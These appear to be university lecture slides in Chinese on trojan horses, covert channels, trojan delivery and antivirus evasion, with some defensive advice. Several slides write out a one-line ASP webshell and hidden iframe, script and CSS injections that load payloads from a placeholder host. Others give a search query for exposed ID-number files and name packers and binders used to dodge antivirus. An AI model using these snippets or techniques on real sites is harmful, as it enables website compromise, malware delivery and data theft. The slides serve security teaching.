第六章: 特洛依木馬與資料竊取技術
Download
Report
Transcript 第六章: 特洛依木馬與資料竊取技術
教育部資通訊人才培育先導型計畫
寬頻有線教學推動聯盟中心
第六章 特洛依木馬與資料竊取技術
國立雲林科技大學
電腦與通訊工程系
第六章 特洛依木馬與資料竊取技術
6.1 後門與隱密性通道原理
6.2 木馬產生術
大綱
6.2.1 原生型木馬
6.2.2 漏洞型木馬
6.2.3 網頁木馬
6.3 木馬傳送的手法與利用的管道
6.3.1 隨身裝置:USB等儲存媒體
6.3.2 惡意超連結:網站、討論區、部落格等
6.3.3 郵件社交工程
6.3.4 利用搜尋引擎
6.3.5 避過防毒軟體的方式
國立雲林科技大學電腦與通訊工程系
2
第六章 特洛依木馬與資料竊取技術
6.1 後門與隱密性通道原理
木馬程式(Trojan horse):
主要特性有偽裝成一般程式、具有遠端遙控目標
主機之能力、具備隱藏特性,不具備自我複製與
散播的特性。目的是用來獲取機密資料、盜用目
標主機資源、當作攻擊跳板。
本身不具備複製與散播的能力,因此攻擊者將木
馬程式放入郵件、文件檔、遊戲程式等,放到檔
案伺服器上讓其他人下載,當下載這些檔案並且
執行時,便會將木馬程式安裝至被害者的電腦裡
。被安裝木馬程式的主機會開啟某個連接埠等待
攻擊者連入。一般而言木馬程式會分為伺服端
(Server)與客戶端(Client)兩部分。
伺服端程式:藏於某些吸引人的檔案中,引誘被
害者下載並執行,當執行後即被安裝木馬程式,
被安裝木馬程式的被害者電腦會開啟一個連接埠
等待攻擊者進行連線。
客戶端程式:攻擊者利用客戶端的操縱程式對伺
服端進行任何的存取動作、更改設定等。
國立雲林科技大學電腦與通訊工程系
3
第六章 特洛依木馬與資料竊取技術
6.1 後門與隱密性通道原理
在木馬程式與後門程式的設計中有三大重點
1.
植入方式:如何引誘受害者在主機上執行木馬程式
2.
隱藏方式:如何在程式執行時隱藏自已不被使用者或偵測程式所發
現
3.
溝通方式:操控端及受控端要如何溝通
國立雲林科技大學電腦與通訊工程系
4
第六章 特洛依木馬與資料竊取技術
6.1 後門與隱密性通道原理
在木馬程式與後門程式中較常見的幾種隱密通道方式如下:
1. 直接連結
木馬程式的受控者端選擇一特定的通訊埠等待木馬程式操控端連結。連結之後再
以此連線進行指令及結果的傳送。此種方式多半會被防火牆阻擋,且操控者端與
受控端直接連線容易被追蹤。
2. 以電子郵件挾帶資料
利用目前常見的許多免費的電子郵件信箱,受控端將所要傳送的資料置於電子郵
件內容中,寄至操控端指定的電子郵件信箱帳號,與直接連結方式相比,較不易
被追蹤。
3. 以公眾留言版留下資料
木馬程式或後門程式的受控端可被設計成由公眾留言版接收指令,也可於公眾留
言版留下回應訊息。只要主機能夠存取外部的 www 資源,此方法便可運作。
國立雲林科技大學電腦與通訊工程系
5
第六章 特洛依木馬與資料竊取技術
6.1 後門與隱密性通道原理
常見的幾種隱密通道方式(Cont.)
4.以 IRC「接受指令及傳送結果」
木馬程式受控端可以client形式連結至外部IRC伺服器,攻擊者便可即時
控制木馬受控端行動。
5. 以 FTP「取得指令或上傳結果」
木馬程式操控端及受控端以外部 FTP 伺服器作為中介站,進行指令及資
料的交換。
6. 以特殊格式封包進行木馬程式之間的溝通
攻擊者可利用預先定義好的網路封包格式來傳送指令至受害者端。
7. 以即時通訊軟體作為溝通的管道
使用者可以利用即時通訊軟體來傳送訊息、檔案等資料至另一台同樣安
裝有相同的即時通訊的電腦。隨著即時通訊軟體的盛行,木馬與後門程
式也開始利用即時通訊軟體來傳送資料。
國立雲林科技大學電腦與通訊工程系
6
第六章 特洛依木馬與資料竊取技術
6.2 木馬產生術
第一代木馬:
主要對付Unix系統,而Windows當時為數不多,代表作:BO、NetSpy等
第二代木馬:
建構了目前大多數駭客對木馬定義的功能,這時期開始Windows型木馬改為主流,代表作:BO2000、
Sub7、冰河等
第三代木馬:
增加了穿透防火牆的功能(反向連結)等技術來逃避單機型防火牆及IP分享器之功能。代表作:灰鴿子家
族
第四代木馬:
再增加了執行緒隱藏技術DLL Injection並漸漸往Rootkit 技術整合,使系統更加難以發現木馬的存在與入
侵的連接。
第五代木馬:
可隨機替換掉一個狀態為停止的系統服務,不會在註冊表中新增任何的值,安裝後木馬的檔名、與存放
的目錄與路徑都是隨機的,會自動關閉自己隨機選的port等需要時再隨機選一個傳輸。
不管是哪種類別的木馬(網頁木馬、asp木馬等),最終都是需要將exe檔的木馬傳至被害(駭)的電腦中,
只是利用不同的傳播類別增加攔截的困難度。
國立雲林科技大學電腦與通訊工程系
7
第六章 特洛依木馬與資料竊取技術
6.2.1 原生型木馬
原生型木馬:
常見的副檔名:.exe、.com
此種木馬本身就是一個完整的遠端控制型的木馬程序,不需要依賴
漏洞。
感染後的行為:
1.
2.
3.
直接利用該木馬執行檔做竊取
利用DLL Injection技巧與正常程式綑綁的木馬做竊取
利用Rootkit技巧與系統程式綑綁的木馬做竊取
國立雲林科技大學電腦與通訊工程系
8
第六章 特洛依木馬與資料竊取技術
6.2.1 原生型木馬
原生型木馬的感染流程
駭客
P2P網站、論壇、程式收集區
不知情的一般使用者
原生型木馬
國立雲林科技大學電腦與通訊工程系
9
第六章 特洛依木馬與資料竊取技術
6.2.2 漏洞型木馬
漏洞型木馬:
常見的副檔名:.exe、.htm、.html
利用作業系統、瀏覽器、應用程式的漏洞來感染及植入木馬程式。
例如:MS07017
此類型的木馬也可大致上分為二類:
利用木馬產生器產生出類似於原生型木馬的.exe檔,再利用各種社交工
程手法傳給目標主機,與原生型木馬的差別在於,如果目標主機不具有
相對應的漏洞則不會觸發之後的感染行為。
利用木馬產生器產生出僅具有HTML程式碼的.htm檔,再利用網頁瀏覽
的方式來觸發執行.exe檔木馬。
國立雲林科技大學電腦與通訊工程系
10
第六章 特洛依木馬與資料竊取技術
6.2.2 漏洞型木馬
漏洞型木馬的感染流程
首頁或其他網頁被植
入<iFrame>隱藏框架
引導到跳板網站
駭客
知名的官方網站
首頁
不知情的一般使用者
網路釣魚
跳板網站 原生型木馬 漏洞型網馬
國立雲林科技大學電腦與通訊工程系
11
第六章 特洛依木馬與資料竊取技術
6.2.3 網頁型木馬
網頁型木馬:
常見的附檔名:.asp、.aspx、.php
可分為二種型式:
asp或php網頁型木馬:就是利用asp或php語法並添加各種可以控制檔案
的指令所撰寫出來的一個類似檔案總管的網頁,也稱之為「Webshell 」
。 (還可細分為含FSO檔案瀏覽功能與不含FSO的網頁木馬)
一句話網頁木馬:只利用一行語法來傳值的木馬。
例如:<%eval request(“value”)>
國立雲林科技大學電腦與通訊工程系
12
第六章 特洛依木馬與資料竊取技術
6.2.3 網頁型木馬
網頁型木馬的感染流程
[上傳]具FSO功
能的網頁木馬
駭客
知名的官方網站
首頁
不知情的一般使用者
[掛馬]將首頁或其他網
頁植入<iFrame>隱藏框
架引導到跳板網站
漏洞型網頁木馬
跳板網站 原生型木馬
國立雲林科技大學電腦與通訊工程系
13
第六章 特洛依木馬與資料竊取技術
6.2.3 網頁型木馬
框架掛馬:
<iframe src=木馬網址width=0 height=0></iframe>
JScript 文件掛馬:首先將以下語法存檔為xxx.js然後將此文件利用各種方式上傳到目標處
document.write("<iframe width='0' height='0' src='木馬網址'></iframe>");
最後JScript 掛馬的語法為:
<script language=javascript src=xxx.js></script>
JScript 變型加密:
<SCRIPT language=“JScript.Encode”
src=http://www.xxx.com/muma.txt></script>
muma.txt 可改成任何附檔名
body 掛馬:
<body onload="window.location='木馬網址';"></body>
隱藏掛馬:
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe
src="http://www.xxx.com/muma.htm/"></iframe>';
國立雲林科技大學電腦與通訊工程系
14
第六章 特洛依木馬與資料竊取技術
6.2.3 網頁型木馬
CSS 中掛馬:先將製作好的muma.js 先利用各種方式上傳至目標處。
body {
background-image: url('javascript:document.write("<script
src=http://www.XXX.net/muma.js></script>")')}
JAVA 掛馬:
<SCRIPT language=javascript>
window.open ("木馬網址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro
llbars=no,width=1,height=1");
</script>
圖片偽裝:
<html>
<iframe src="網馬網址" height=0 width=0></iframe>
<img src="圖片網址">
</html>
國立雲林科技大學電腦與通訊工程系
15
第六章 特洛依木馬與資料竊取技術
6.2.3 網頁型木馬
偽裝呼叫:
<frameset rows="444,0" cols="*">
<frame src="開啟的網頁" framborder="no" scrolling="auto" noresize
marginwidth="0"margingheight="0">
<frame src="網馬網址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
欺騙超連結網址手法:
<a href="http://www.XYZ.com(迷惑他人超連結網址,故意顯示這個網址卻連向木馬網址)"
onMouseOver="www_163_com(); return true;"> 網頁要顯示的內容</a>
<SCRIPT Language="JavaScript">
function www_XYZ_com ()
{
var url="真正連的網頁木馬網址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,r
esizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
國立雲林科技大學電腦與通訊工程系
16
第六章 特洛依木馬與資料竊取技術
6.3 木馬傳送的手法與利用的管道
6.3.1 隨身裝置:USB等儲存媒體
6.3.2 惡意超連結:網站、討論區、部落格等
6.3.3 郵件社交工程
6.3.4 利用搜尋引擎
6.3.5 避過防毒軟體的方式
國立雲林科技大學電腦與通訊工程系
17
第六章 特洛依木馬與資料竊取技術
資料來源
http://www.ithome.com.tw/itadm/article.php?c=47217
6.3.1 隨身裝置:USB等儲存媒體
資料來源
http://www.libertytimes.com.tw/2007/new/nov/11/today-fo5.htm
國立雲林科技大學電腦與通訊工程系
18
第六章 特洛依木馬與資料竊取技術
6.3.1 隨身裝置:USB等儲存媒體
什麼是USB病毒
USB病毒指的是透過USB外接儲存裝置感染擴散的病毒與蠕蟲,通常是由惡意程式與
autorun.inf自動執行檔組成。其中的autorun.inf自動執行檔並不是病毒,而是一個記載著自
動執行程序的檔案,一般光碟片放入電腦後能夠自動執行就是作業系統的「自動執行」功
能偵測到autorun.inf後,依照autorun.inf的敘述執行特定檔案。
因此,當含有USB病毒的USB隨身碟接到電腦後,電腦會依照autorun.inf自動執行檔的設定
,自動執行USB隨身碟中的惡意程式,因而感染了病毒。如果電腦沒辦法掃除這個病毒,
日後其他的USB隨身碟再插上這臺電腦時,這個病毒就會再感染該隨身碟。病毒就藉由隨
身碟在不同電腦中交換使用而交互擴散感染。
如何防範USB病毒
1.
2.
3.
4.
安裝防毒軟體並定期更新病毒碼。
安裝個人防火牆,藉由監控連網行為找出惡意程式
插入外接USB儲存裝置的同時,一直按著Shift鍵不放,直到確定電腦連接上外接裝置
後再放開,以避免自動執行外接裝置中的惡意程式。
關閉電腦的Autorun功能
國立雲林科技大學電腦與通訊工程系
19
第六章 特洛依木馬與資料竊取技術
6.3.1 隨身裝置:USB等儲存媒體
資料來源 http://tw.trendmicro.com
國立雲林科技大學電腦與通訊工程系
20
第六章 特洛依木馬與資料竊取技術
網站、討論區、部落格被惡意掛馬的原因
6.3.2 惡意超連結:網站、討論區、部落格等
Web網站上具有缺失
網站伺服器存在弱點或管理不當
不安全的預設網站路徑與記錄檔檔案配置
沒有更改預設的管理者密碼
設定不當的網頁存取權限
沒有刪除不必要之網站或虛擬目錄
網頁應用程式設計錯誤,具有資料庫隱碼(SQL Injection)弱點
開發的程式可進行跨網站指令碼(XSS)攻擊
開發的程式可進行Session Hijacking攻擊或Cookie欺騙
利用這些缺失來植入網頁型木馬搭配漏洞型木馬
國立雲林科技大學電腦與通訊工程系
21
第六章 特洛依木馬與資料竊取技術
6.3.2 惡意超連結:網站、討論區、部落格等
網站惡意掛馬手法
內嵌
直接在網頁中嵌入惡意程式碼(可導致使用者作業系統被入侵的程式碼)
例如:攻擊Internet Explorer弱點的攻擊程式(MS06-14)
優點:不容易讓使用者發覺
缺點:
1. 可能會被伺服器上的防毒軟體掃除
2. 惡意程式改版不易
3. 須取得完整修改網頁的權限
國立雲林科技大學電腦與通訊工程系
22
第六章 特洛依木馬與資料竊取技術
6.3.2 惡意超連結:網站、討論區、部落格等
網站惡意掛馬手法(Cont.)
外連:
將使用者導引至外部網站
常見的實作手法
1. 修改網頁HTML語法,將使用者導引至外部網站,如IFRAME語法
2. 使用JS檔案將使用者導引至外部網站
優點:
1. 僅需取得插入一行程式碼的權限
2. 駭客可以隨時修改惡意程式
缺點:駭客所使用的網址會被加入黑名單
國立雲林科技大學電腦與通訊工程系
23
第六章 特洛依木馬與資料竊取技術
6.3.2 惡意超連結:網站、討論區、部落格等
外連範例:多媒體檔案
部份多媒體檔案為了增加互動性,支援內嵌script的功能,當使用者
播放該多媒體檔案,將會觸發script的執行。
常見可執行script的多媒體格式
Real Player:RM格式
Flash:SWF格式
Microsoft Media Player:WMV格式
駭客可以修改script內容,在播放影片時將使用者導引至惡意網站。
國立雲林科技大學電腦與通訊工程系
24
第六章 特洛依木馬與資料竊取技術
6.3.3 郵件社交工程
社交工程的定義
社交工程為利用人性弱點或利用人際之信任關係,獲取不當資訊。
使用與人互動的技巧即可獲取帳號、密碼、信用卡密碼、身分證號
碼、姓名、地址或其他可確認身分或機密資料的方法。
社交工程攻擊的定義
利用人性弱點、人際交往或互動特性所發展出來的一種攻擊方法
早期社交工程是使用電話或其他非網路方式來詢問個人資料,而目
前社交工程大都是利用電子郵件或網頁來進行攻擊
透過電子郵件進行攻擊之常見手法
假冒寄件者
使用與業務相關或令人感興趣的郵件內容
含有惡意程式的附件或連結
利用應用程式之弱點(包括零時差攻擊)
國立雲林科技大學電腦與通訊工程系
25
第六章 特洛依木馬與資料竊取技術
6.3.3 郵件社交工程
郵件社交工程攻擊模式
Internet
1.
2.
3.
4.
5.
6.
攻擊者設計惡意程式(例如木馬或是後門程式)
將惡意程式置入電子郵件中
寄發電子郵件給特定的目標
受害者開啟電子郵件
執行攻擊者設計的惡意程式,將被植入後門程式
後門程式逆向連接,向遠端攻擊者通訊
國立雲林科技大學電腦與通訊工程系
26
第六章 特洛依木馬與資料竊取技術
6.3.3 郵件社交工程
資料來源 http://tw.trendmicro.com
國立雲林科技大學電腦與通訊工程系
27
第六章 特洛依木馬與資料竊取技術
6.3.3 郵件社交工程
資料來源 http://tw.trendmicro.com
國立雲林科技大學電腦與通訊工程系
28
第六章 特洛依木馬與資料竊取技術
6.3.3 郵件社交工程
使用電子郵件時應有的習慣
收信
檢查寄件者的真偽。
確認信件內容的真實度 (郵件主旨、附加檔案)。
不輕易開啟郵件中的超連結以及附件。
開啟超連結或檔案前,確認對應軟體(如IE、Office、壓縮軟體)都保持
在最新的修補狀態。
寄件者或郵件主旨與自已無關者 ,建議應立即刪除不要開啟郵件 。
轉信或寄信
未經查證之訊息,不要轉寄。
轉寄郵件前先將他人郵件地址刪除,避免別人的電子郵件地址傳出。
寄送信件給群體收件者時,應將收件者列在密件副件,以免收件人資訊
外洩。
國立雲林科技大學電腦與通訊工程系
29
第六章 特洛依木馬與資料竊取技術
6.3.4 利用搜尋引擎
手法一:購買網路關鍵字廣告服務並於各大入口網站搜尋行銷服務刊登
「關鍵字廣告」,使用者上網搜尋「網路銀行」等條件時,搜尋結果的
最上方即出現犯罪集團之「關鍵字廣告」。
手法二:由於搜尋引擎的搜尋機器人太強大,可能會將已經被植入惡意
連結的網站建立成索引(index),提供給一般人搜尋。如果該搜尋引擎沒
有做好安全控管則易被使用者點選。
一般民眾認為搜尋網站的搜尋結果應該很可靠,進而點選進去。因為這
些廣告或網站是有心人士精心設計,網站管理者亦無法判別廣告之真偽
,更何況一般人,幾乎無法查覺該網站連結是假冒之網站。
國立雲林科技大學電腦與通訊工程系
30
第六章 特洛依木馬與資料竊取技術
資料來源 http://www.zdnet.com.tw
6.3.4 利用搜尋引擎
資料來源 http://www.ithome.com.tw
國立雲林科技大學電腦與通訊工程系
31
第六章 特洛依木馬與資料竊取技術
6.3.4 利用搜尋引擎
駭客詐騙集團利用關鍵字搜尋,架設假網站,搜尋「土地銀行landbank」網站的網址,英
文「land」應是小寫的「l」(圖左下),仔細看可發現變成 阿拉伯數字的「1」,一旦網
友連結,便會遭到詐騙集團以「網路釣魚」方式植入木馬程式,即可任意轉帳或盜取你的
個人資料 。
資料來源 http://www.libertytimes.com.tw
國立雲林科技大學電腦與通訊工程系
32
第六章 特洛依木馬與資料竊取技術
手法三:透過有意義的搜尋字串在搜尋引擎中取得攻擊目標資訊,以
google為例,先了解有哪些搜尋相關的指令。
基本指令
+ : 強制包含某query
- : 排除某query
“ : 組合多個term成為一個query
. : match單一字元
* : match任意數量的任何字元
| : OR運算
進階指令
6.3.4 利用搜尋引擎
filetype, inurl, allinurl, site, intitle, allintitle, intext, allintext, numrange, daterange
例如要查詢的關鍵字「身份證字號」,排除含有「範本」的字樣,並且
只要副檔名為「.xls」的搜尋結果,可參照下圖的語法。
國立雲林科技大學電腦與通訊工程系
33
第六章 特洛依木馬與資料竊取技術
6.3.4 利用搜尋引擎
如果不清楚語法如何使用,也可以直接使用google的進階搜尋功能,如下圖1,在[包含全
部的字詞]欄位裡輸入「身份證字號」,[不包括指定字詞]輸入「範本」,在[檔案類型]選
擇「.xls」,這樣就和輸入「身份證字號 -範本 filetype:xls」的語法相同。搜尋結果如下圖2
。
圖1
圖2
國立雲林科技大學電腦與通訊工程系
34
第六章 特洛依木馬與資料竊取技術
常用的方式便是針對木馬的執行檔進行
6.3.5 避過防毒軟體的方式
加殼:對.exe壓縮(瘦身)或加密(阻擋反組譯)等重組變形
編碼:對.htm的HTML語法做函數的編碼
加密:對.htm的HTML語法做加密
綑綁合併:與正常程式綑綁在一起做為偽裝
當進行這些程序後木馬便會變更其「特徵值」使防毒軟體對
該木馬的檔案辨識不出來進而放行。
國立雲林科技大學電腦與通訊工程系
35
第六章 特洛依木馬與資料竊取技術
6.3.5 避過防毒軟體的方式
加殼
原始目的:
1.
2.
保護程式原始碼防止修改
可以減少程式的體積
木馬再狡猾一旦被防毒軟體定義了特徵碼,會在執行前就被攔截了
。所以要躲過防毒軟體的追殺,很多木馬就被加了殼。
對木馬加殼的行為則類似對程式本身作二次封裝或加密或壓縮的變
化,目的在於讓防毒軟體無法識別出他的原始身分並改變木馬的特
徵檔(偽裝成正常軟體)。
對付這種木馬的方法是使用具有脫殼能力的防毒軟體對系統進行保
護。
常 用 的 加 殼 軟 體 : ASPACK 、 UPX 、 WWPACK32 、 PE-PACK 、
PECompact、PKLITE32、NeoLite、Shrinker
國立雲林科技大學電腦與通訊工程系
36
第六章 特洛依木馬與資料竊取技術
6.3.5 避過防毒軟體的方式
編碼與加密
常見於網頁型的木馬,將HTML內Script語法做編碼或加密,來迷惑
防毒軟體或Web攔截程式。
常用函數:
Escape加密函數與unescape解密函數
Encode加密函數
添零(加空格)加密
自寫函數加密
國立雲林科技大學電腦與通訊工程系
37
第六章 特洛依木馬與資料竊取技術
6.3.5 避過防毒軟體的方式
自訂加解密函數
資料來源
網路攻防技術研討課程Day4_惡意程式.pdf
國立雲林科技大學電腦與通訊工程系
38
第六章 特洛依木馬與資料竊取技術
6.3.5 避過防毒軟體的方式
綑綁合併
木馬的植入程式大多是.exe檔,大部分有警覺心的使用者及管理員均
不會去點選。所以必須要使用綑綁正常程式(常見Flash或Office檔案)
之方法,誘騙(社交工程)目標去點選來達成目的。
為了不引起懷疑,入侵者可以把正常程式(好康程式、小遊戲、序號
程式、免光碟程式)與木馬程式合併成一個檔案來作為偽裝。
高階一點的技巧可以利用應用程式(Office檔案、Flash、影音播放程
式)的漏洞,來與漏洞型木馬合併,藉由點選該檔案後執行一連串的
連鎖觸發,來到植入原生型木馬的目的。
當木馬與正常程式合併時會重新編碼,達到欺騙防毒軟體之效果。
常用工具: Deception Binder、 FreshBind、 MicroJoiner、 ExeBinder
國立雲林科技大學電腦與通訊工程系
39
第六章 特洛依木馬與資料竊取技術
參考資料
「電子郵件社交工程防護.ppt」。
「CourseFile_49_SCO-B1-202Trojan.doc」。
「網路攻防戰之入侵大揭秘(木馬篇).pdf」。
「防止攻擊跳板主機的安全管理策略.ppt」。
「木馬入侵大揭秘第02集_精華版_講義.pdf」。
「網路安全與管理」,作者:伍麗樵,陳世仁。
「網路攻防技術研討課程Day4_惡意程式.pdf」。
「以網路協定為基礎的隱密通道- 其威脅與防制.pdf」。
「http://www.zdnet.com.tw」。
「http://tw.trendmicro.com」 趨勢科技。
「http://www.ithome.com.tw 」iThome online。
「http://elearning.nat.gov.tw 」電子化政府-網路文官學院。
「http://www.libertytimes.com.tw/index.htm 」自由時報電子報。
「http://armorize-cht.blogspot.com 」阿瑪科技非官方中文Blog。
「http://blog.xuite.net/anson0513/ayo/14674757」新硬碟也有木馬!注意USB病毒。
「http://www.csie.nctu.edu.tw/~skhuang/backdoor.htm」防止攻擊跳板主機的安全管理策略 。
「http://bo2k.sourceforge.net/software/bo2k10.html 」Back Orifice 2000 Server Enhancement Plugins Web Page。
國立雲林科技大學電腦與通訊工程系
40